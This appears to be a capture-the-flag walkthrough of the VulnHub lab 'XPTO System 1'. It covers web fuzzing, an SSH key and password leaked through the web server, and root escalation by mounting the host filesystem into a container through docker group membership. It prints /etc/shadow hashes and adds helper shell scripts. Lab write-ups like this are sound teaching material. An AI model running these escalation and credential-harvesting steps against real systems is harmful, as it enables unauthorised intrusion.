https://www.vulnhub.com/entry/xpto-system-1,635/
A port scan shows 80 (HTTP) and 1337 (SSH) open.
Nmap reported a ".git" directory on the web server, so I tried GitTools on it, but got nothing useful.
We continue with port 80.
The source of login.php refers to a README file.
We use wfuzz to find the README file's extension; --hh 276 hides the 276-character responses (the size of a miss), leaving a single hit, README.md:
┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ wfuzz -w /usr/share/seclists/Fuzzing/extensions-compressed.fuzz.txt --hh 276 "http://192.168.33.130/README.FUZZ"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.33.130/README.FUZZ
Total requests: 186
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000081:   200        23 L     53 W       363 Ch      "md"

Total time: 0
Processed Requests: 186
Filtered Requests: 185
Requests/sec.: 0
README.md is a developer note in Portuguese: a TODO list (fix the logout page; create the post-login dashboard page), useful Docker commands for the web server container (the site runs from a php:apache container with ~/http bind-mounted as the web root), a credential web:pipocadoce, and a directory "/delete-me".
┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ curl http://192.168.33.130/README.md
#TODO
- Consertar a pagina de logout
- Criar a pagina de dashboard pos login

#Comandos uteis
##Start container
$ docker run --name webserver -d -p 80:80 -v ~/http:/var/www/html php:apache
##Stop container
$ docker stop webserver
##Start container
$ docker start webserver
##Image list
$ docker images
##Credential
web:pipocadoce
### View Access
/delete-me
Visiting /delete-me gives us an SSH private key, dumped as a bare base64 body without the BEGIN/END lines.
┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ curl http://192.168.33.130/delete-me/
<html>
<head>
<title>Key for Access</title>
</head>
<body>
<h2>Follow access data for server</h2>
<pre>
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c
tLDiaRrkdVlYzNAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7NKnI03+l
...
wI21jo1EbjVLKbJrIQEJFGzmPLBUEspriCY3BTIdXNl1jxgUZ4RRR6hirIjm66DZIfrK/d
yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa
zq6sb9anB+QPpgBYUdUOVZ9nwzfAw=
</pre>
<h1>Good Luck ;)</h1>
</body>
</html>
Save the base64 data to a file id_rsa and restore the format ssh expects by adding the "-----BEGIN OPENSSH PRIVATE KEY-----" and "-----END OPENSSH PRIVATE KEY-----" lines. Don't forget chmod 600; ssh refuses a key file that other users can read.
┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c
...
yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa
zq6sb9anB+QPpgBYUdUOVZ9nwzfAw=
-----END OPENSSH PRIVATE KEY-----
Now we can ssh to port 1337 as user "web" with this key. The key is passphrase-protected: its first line decodes to the openssh-key-v1 header with cipher aes256-ctr and KDF bcrypt, so ssh prompts for a passphrase, and the password from README.md is the one to give.
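The key reconstruction above, as an added example that is not part of the original walkthrough: a POSIX shell script that wraps a bare base64 body into the file format ssh expects and then reads the openssh-key-v1 header to tell whether the key is passphrase-protected before trying it. It uses only the first line of the blob shown on the page (the rest of the key is elided there), which is enough to recover the cipher and KDF names, plus a constructed unencrypted header for comparison; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): wrap a bare base64 key
# body into a usable OpenSSH key file and read its header to learn whether the
# key is passphrase-protected before trying it.
set -eu

# First base64 line of the key body shown on the page (/delete-me). The rest of
# the key is elided on the page, so this is only enough for the header check.
PAGE_KEY_LINE1='b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c'

# wrap_openssh_key BODY_B64 OUTFILE
# Writes the armored form ssh expects: header line, body folded to the
# 70-column lines ssh-keygen itself produces, footer line, and mode 0600.
wrap_openssh_key() {
  body=$(printf '%s' "$1" | tr -d ' \n' | fold -w 70)
  printf '%s\n%s\n%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' "$body" \
    '-----END OPENSSH PRIVATE KEY-----' > "$2"
  chmod 600 "$2"
}

# Helpers for the binary header: big-endian uint32 at OFFSET, and LEN raw bytes
# at OFFSET (the SSH "string" wire type is a uint32 length followed by bytes).
u32_at() { printf '%d' "0x$(od -An -v -tx1 -j "$2" -N 4 "$1" | tr -d ' \n')"; }
str_at() { dd if="$1" bs=1 skip="$2" count="$3" 2>/dev/null; }

# openssh_key_header KEYFILE
# Prints "<cipher> <kdf>" from the openssh-key-v1 header. "none none" means the
# private part is stored in the clear; anything else (e.g. "aes256-ctr bcrypt")
# means ssh will prompt for a passphrase.
openssh_key_header() {
  raw=$(mktemp)
  # Strip the armor and drop an incomplete trailing base64 quantum (the page's
  # blob is cut off mid-key), then decode.
  b64=$(grep -v -e '-----' "$1" | tr -d '\n')
  b64=$(printf '%s' "$b64" | cut -c1-$(( ${#b64} / 4 * 4 )))
  printf '%s' "$b64" | base64 -d > "$raw"
  if [ "$(str_at "$raw" 0 14)" != "openssh-key-v1" ]; then
    rm -f "$raw"
    echo "not an openssh-key-v1 blob" >&2
    return 1
  fi
  off=15                                   # skip the NUL-terminated magic
  n=$(u32_at "$raw" "$off"); cipher=$(str_at "$raw" $((off + 4)) "$n"); off=$((off + 4 + n))
  n=$(u32_at "$raw" "$off"); kdf=$(str_at "$raw" $((off + 4)) "$n")
  rm -f "$raw"
  printf '%s %s\n' "$cipher" "$kdf"
}

# make_clear_header_b64
# Constructed sample for comparison: an openssh-key-v1 header with cipher
# "none", kdf "none", empty kdf options and a key count of 1. It is not a real
# key; it only exercises the header parser.
make_clear_header_b64() {
  printf 'openssh-key-v1\0\0\0\0\004none\0\0\0\004none\0\0\0\0\0\0\0\001' | base64 | tr -d '\n'
}

# Stand-alone demo on the page's blob.
demo_key=$(mktemp)
wrap_openssh_key "$PAGE_KEY_LINE1" "$demo_key"
printf 'page key: %s\n' "$(openssh_key_header "$demo_key")"   # aes256-ctr bcrypt
rm -f "$demo_key"
```

On the page's blob the check prints "aes256-ctr bcrypt", so a passphrase prompt is expected and not a sign that the file was reconstructed wrongly; a key stored in the clear reports "none none". Running this before fighting with format problems saves time whenever a key turns up in a web directory or a repository.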
In the home directory there is remember.txt, which gives the password of another user; that turns out to be a rabbit hole.
I enumerated a lot but could not get root. So let's check the author's note on VulnHub.
The goal is to find a hidden directory: the directory's name is root's password.
The good news: user "web" is in the docker group. That is effectively root, because anyone who can talk to the Docker daemon can start a container with arbitrary bind mounts, and the daemon itself runs as root.
There is only one image and one container on the machine, the web server (the php:apache image from the README).
We start a fresh container from that image with the host's root filesystem bind-mounted at /mnt. Inside the container we are root, and through the mount that is root-level access to every file on the host.
web@xptosystem:~$ docker run -v /:/mnt -i -t php:apache /bin/bash
root@e07d13fc2299:/var/www/html# cd /mnt/root
root@e07d13fc2299:/mnt/root# ls -la
total 24
drwx------  3 root root 4096 Sep  3  2020 .
drwxr-xr-x 18 root root 4096 Mar 16 02:40 ..
-rw-------  1 root root   10 Dec 17 21:18 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Aug 20  2020 .local
-rw-r--r--  1 root root  290 Aug 20  2020 .profile
root@e07d13fc2299:/mnt/root#
Now we can read the host's /etc/shadow and get root's password hash.
root@e07d13fc2299:/mnt/root# cd /mnt/etc
root@e07d13fc2299:/mnt/etc# cat shadow
root:$6$o/k7d563qPPliQWL$cc4vN4uZ6dmh4YoP/pnHdZz3xZExq1N.J83sfWRJy3wdIrXKjTPER3bcQKDaHYBjA/6EsA6c9Zj5zGL3VLEMm1:18508:0:99999:7:::
daemon:*:18494:0:99999:7:::
...
sshd:*:18494:0:99999:7:::
systemd-coredump:!!:18494::::::
web:$6$6caYruQd7gWLfrGs$w.VkTioPN.TvWEZ1lTsj/QSzGoMHxHmTSJUHQrLvQ0k5Dll/A.wDevhJQR2bMIZqgTAJd0dq9K3PLFjhX1Lj7.:18494:0:99999:7:::
sysdev:$6$CMnj1i3VnF0Dev7p$4LssZsU4sW7cRVf7tEcth4vmB8umVzae6FLTrEDQI.SFJFeVme.uTe5Ws8GxpZO5cXRUAD8kcbJYuxIL2AX0e/:18508:0:99999:7:::
root@e07d13fc2299:/mnt/etc#
We could brute force the password hash, but I prefer to find another way.
Let's look for a directory modified less than 4 months ago (the author built the machine in December 2020), using find with -mtime -120.
We need "-not -path" to drop the trees we don't care about (/proc, /sys, /run and Docker's own storage), which are constantly modified and would flood the output.
Here is the command, run inside the container against the mounted host filesystem:
root@e07d13fc2299:/mnt/etc# find /mnt/ -mtime -120 -not -path "/mnt/proc/*" -not -path "/mnt/sys/*" -not -path "/mnt/var/lib/docker/*" -not -path "/mnt/run/*"
This turns up one odd directory.
Accessing it directly on the VM as user web is denied.
Inside the container we are root, so we can read the secret file in it. (The directory's name is also in rockyou.txt, so the root hash could have been cracked with that wordlist instead.)
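The directory search above, as an added example that is not part of the original walkthrough: a POSIX shell script that builds a constructed stand-in for the mounted host filesystem (every name under the temp directory is invented), runs the -not -path style search from the walkthrough, and compares it with a -prune form. It shows why the -not -path form still prints /proc, /sys, /run and Docker's storage directory themselves (the pattern "/mnt/proc/*" does not match "/mnt/proc"), and that -prune also stops find from walking those trees at all.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): the "recently modified
# directory" hunt on a constructed tree, first with the -not -path filters the
# walkthrough uses, then with -prune, which is the form to reach for on a
# real host.
set -eu

# make_sample_root
# Builds a constructed stand-in for the bind-mounted host filesystem (/mnt in
# the walkthrough) and prints its path. Everything is dated 2010 except the
# always-churning pseudo-filesystems, Docker's storage, and one hidden
# directory under /opt. All names are invented for the example.
make_sample_root() {
  root=$(mktemp -d)
  mkdir -p "$root/proc/1" "$root/sys/kernel" "$root/var/lib/docker/overlay2" \
           "$root/run/user" "$root/etc" "$root/home/web" "$root/opt/.s3cr3t"
  : > "$root/etc/hostname"
  : > "$root/opt/.s3cr3t/secret.pdf"
  # Old, uninteresting parts of the tree (POSIX touch -t: [CC]YYMMDDhhmm)
  touch -t 201001310000 "$root/etc" "$root/etc/hostname" "$root/home" \
        "$root/home/web" "$root/var" "$root/var/lib" "$root/opt"
  # Noise that is always fresh on a live system
  touch "$root/proc" "$root/proc/1" "$root/sys" "$root/sys/kernel" \
        "$root/var/lib/docker" "$root/var/lib/docker/overlay2" \
        "$root/run" "$root/run/user"
  # The target: a recently created directory outside the noisy trees
  touch "$root/opt/.s3cr3t" "$root/opt/.s3cr3t/secret.pdf"
  printf '%s\n' "$root"
}

# recent_dirs ROOT DAYS
# The walkthrough's approach with -not -path. "$ROOT/proc/*" does not match
# "$ROOT/proc" itself, so the excluded top-level directories still print, and
# find still walks through them before discarding the results.
recent_dirs() {
  find "$1" -mindepth 1 -type d -mtime "-$2" \
    -not -path "$1/proc/*" -not -path "$1/sys/*" \
    -not -path "$1/var/lib/docker/*" -not -path "$1/run/*"
}

# recent_dirs_pruned ROOT DAYS
# Same search with -prune: find never descends into the excluded trees and
# does not print them either, so only genuinely interesting hits remain.
recent_dirs_pruned() {
  find "$1" -mindepth 1 \
    \( -path "$1/proc" -o -path "$1/sys" -o -path "$1/var/lib/docker" -o -path "$1/run" \) -prune \
    -o -type d -mtime "-$2" -print
}

# Stand-alone demo: the -not -path form lists five directories, the -prune
# form lists only the hidden one under /opt.
sample=$(make_sample_root)
printf '== -not -path ==\n'; recent_dirs "$sample" 120
printf '== -prune ==\n';     recent_dirs_pruned "$sample" 120
```

-mtime -120 means modified within the last 120*24 hours, and a directory's mtime changes when an entry is created, renamed or deleted in it, not when a file inside is edited, which is exactly why a freshly planted directory stands out. With GNU find an absolute cutoff such as -newermt 2020-12-01 is often the better fit when the build date is known, as it is here from the VulnHub page.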
Checking the file type with file shows the secret file is a PDF.
We copy it to /mnt/tmp in the container, which is /tmp on the VM,
and chmod 666 it so that user web can read it.
Finally, we download the file from the VM (scp over the SSH port 1337 works) and open it. Here is the flag.